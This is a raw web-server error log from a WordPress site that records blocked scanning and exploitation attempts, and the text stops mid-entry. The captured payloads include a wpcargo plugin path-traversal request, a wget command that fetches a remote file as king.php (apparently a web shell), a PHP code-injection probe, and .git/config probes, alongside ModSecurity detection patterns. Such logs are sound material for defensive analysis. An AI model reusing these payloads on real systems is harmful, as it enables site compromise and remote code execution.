serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 24 10:07:32.357255 2023] [autoindex:error] [pid 21315:tid 140024699930368] [client 43.153.16.142:50724] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Feb 25 11:20:26.629223 2023] [autoindex:error] [pid 8996:tid 140377776383744] [client 52.140.215.102:43012] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Feb 26 06:48:42.515159 2023] [autoindex:error] [pid 10161:tid 140557359736576] [client 20.163.68.86:60308] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/02/26 13:12:59 [error] 10121#10121: *182780 access forbidden by rule, client: 3.227.233.255, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Feb 27 15:38:10.708353 2023] [:error] [pid 3969:tid 140414862472960] [client 131.226.2.64:41440] [client 131.226.2.64] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "19"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y_0UsvlJNopEKhAZEINpFgAAAMc"] [Tue Feb 28 00:41:44.711610 2023] [:error] [pid 3969:tid 140414778545920] [client 173.252.83.15:34188] [client 173.252.83.15] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-524287"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y_2UGPlJNopEKhAZEIN3GwAAANE"] [Tue Feb 28 03:20:24.046459 2023] [autoindex:error] [pid 3969:tid 140414803724032] [client 43.153.84.6:40738] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Feb 28 04:06:13.573248 2023] [:error] [pid 7973:tid 140553131910912] [client 81.93.142.130:42950] [client 81.93.142.130] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(76));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "Y_3EBUc3O13z5GyrWL1iFAAAAME"] [Tue Feb 28 08:04:03.069092 2023] [autoindex:error] [pid 7542:tid 140553014413056] [client 20.198.105.74:53934] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Feb 28 20:31:58.949149 2023] [:error] [pid 7542:tid 140553022805760] [client 34.163.54.59:54990] [client 34.163.54.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y_6rDr-1GTv0bsY385nsBAAAAI4"], referer: www.google.com [Tue Feb 28 20:31:59.593599 2023] [:error] [pid 7542:tid 140553031198464] [client 34.163.54.59:54992] [client 34.163.54.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y_6rD7-1GTv0bsY385nsBQAAAI0"], referer: www.google.com [Tue Feb 28 20:34:50.350927 2023] [:error] [pid 7973:tid 140553140303616] [client 34.163.54.59:55152] [client 34.163.54.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y_6rukc3O13z5GyrWL18pwAAAMA"], referer: www.google.com [Tue Feb 28 20:34:50.778536 2023] [:error] [pid 7973:tid 140552980842240] [client 34.163.54.59:55154] [client 34.163.54.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y_6rukc3O13z5GyrWL18qAAAANM"], referer: www.google.com [Tue Feb 28 20:37:25.888119 2023] [:error] [pid 7542:tid 140553089947392] [client 34.163.54.59:55326] [client 34.163.54.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y_6sVb-1GTv0bsY385nsKgAAAIY"], referer: www.google.com [Tue Feb 28 20:37:26.967138 2023] [:error] [pid 7542:tid 140553022805760] [client 34.163.54.59:55328] [client 34.163.54.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y_6sVr-1GTv0bsY385nsKwAAAI4"], referer: www.google.com [Tue Feb 28 23:37:58.459087 2023] [autoindex:error] [pid 7973:tid 140552955664128] [client 5.161.127.136:34262] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 28 23:37:58.558294 2023] [autoindex:error] [pid 7541:tid 140553098340096] [client 5.161.127.136:34264] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/02/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Mar 01 12:30:02.003287 2023] [autoindex:error] [pid 23738:tid 140563818972928] [client 5.161.127.136:37330] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Mar 01 12:30:06.760136 2023] [autoindex:error] [pid 30402:tid 140563777009408] [client 5.161.127.136:37336] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/03/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Mar 02 10:05:48.964565 2023] [autoindex:error] [pid 14091:tid 140076466042624] [client 43.153.21.229:60274] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 03 03:55:58.186678 2023] [autoindex:error] [pid 17706:tid 140288080250624] [client 43.130.144.144:51182] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 03 06:42:39.246770 2023] [autoindex:error] [pid 17505:tid 140287917647616] [client 5.78.75.30:58916] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 03 15:01:19.273160 2023] [autoindex:error] [pid 17505:tid 140287850505984] [client 43.130.156.219:51784] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 03 21:55:36.791166 2023] [autoindex:error] [pid 18608:tid 140288071857920] [client 172.82.19.194:47304] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Fri Mar 03 21:55:40.355034 2023] [autoindex:error] [pid 18736:tid 140287968003840] [client 172.82.19.194:47314] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Sat Mar 04 00:42:04.968553 2023] [:error] [pid 18797:tid 140288122214144] [client 151.80.67.229:56084] [client 151.80.67.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(76));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "ZALaLNx-_5eg9NnSeRCm8AAAAUA"] [Sat Mar 04 20:20:27.102484 2023] [autoindex:error] [pid 29517:tid 139727164372736] [client 5.78.75.30:45978] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 04 22:13:24.540600 2023] [autoindex:error] [pid 29517:tid 139727223121664] [client 43.153.110.15:54200] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Mar 05 07:44:45.727915 2023] [autoindex:error] [pid 11565:tid 140610459633408] [client 20.7.133.62:45750] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Mar 05 22:21:25.063413 2023] [:error] [pid 11436:tid 140610501596928] [client 5.188.62.26:49068] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZAVcNQVUPWgRwz99joEawgAAAEI"] [Mon Mar 06 02:00:17.887659 2023] [autoindex:error] [pid 11565:tid 140610476418816] [client 5.78.75.30:58274] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 06 05:03:15.764934 2023] [:error] [pid 15914:tid 140274135119616] [client 5.188.62.76:38586] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZAW6YyanJkxdzJTjF8Ky0wAAANY"] [Mon Mar 06 11:06:40.986219 2023] [autoindex:error] [pid 15914:tid 140274151905024] [client 103.133.214.139:54272] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com 2023/03/07 00:43:08 [error] 15293#15293: *574755 access forbidden by rule, client: 147.182.168.210, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/03/07 00:43:09 [error] 15294#15294: *574843 access forbidden by rule, client: 165.22.120.216, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/03/07 00:43:09 [error] 15293#15293: *574876 access forbidden by rule, client: 128.199.62.55, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/03/07 00:43:10 [error] 15294#15294: *574938 access forbidden by rule, client: 178.62.73.12, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/03/07 00:43:11 [error] 15294#15294: *575006 access forbidden by rule, client: 68.183.13.153, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/03/07 00:43:11 [error] 15293#15293: *575026 access forbidden by rule, client: 159.65.58.104, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Tue Mar 07 02:17:16.747923 2023] [:error] [pid 15914:tid 140274202261248] [client 5.188.62.76:60742] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZAbk_CanJkxdzJTjF8LG3wAAAM4"] [Tue Mar 07 03:08:33.365640 2023] [ssl:warn] [pid 25690:tid 140405316347776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 07 03:08:33.486474 2023] [ssl:warn] [pid 25691:tid 140405316347776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 07 03:08:33.895162 2023] [ssl:warn] [pid 25691:tid 140405316347776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 07 03:08:36.294170 2023] [ssl:warn] [pid 25691:tid 140405316347776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/03/07 03:08:38 [error] 26126#26126: *579802 connect() failed (111: Connection refused) while connecting to upstream, client: 198.199.72.26, server: investigacionperu.com, request: "POST /wp-cron.php?doing_wp_cron=1678176518.7803170680999755859375 HTTP/1.1", upstream: "http://198.199.72.26:8181/wp-cron.php?doing_wp_cron=1678176518.7803170680999755859375", host: "investigacionperu.com", referrer: "https://investigacionperu.com/wp-cron.php?doing_wp_cron=1678176518.7803170680999755859375" [Tue Mar 07 03:08:39.997464 2023] [ssl:warn] [pid 26177:tid 139986753877888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 07 03:08:40.126085 2023] [ssl:warn] [pid 26178:tid 139986753877888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 07 19:17:53.868076 2023] [:error] [pid 26204:tid 139986389128960] [client 66.220.149.6:47400] [client 66.220.149.6] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-524287"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZAfUMYXNk4M_gNCelrp8MQAAAE0"] [Tue Mar 07 19:32:54.758364 2023] [:error] [pid 29428:tid 139986296809216] [client 5.188.62.76:48002] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file 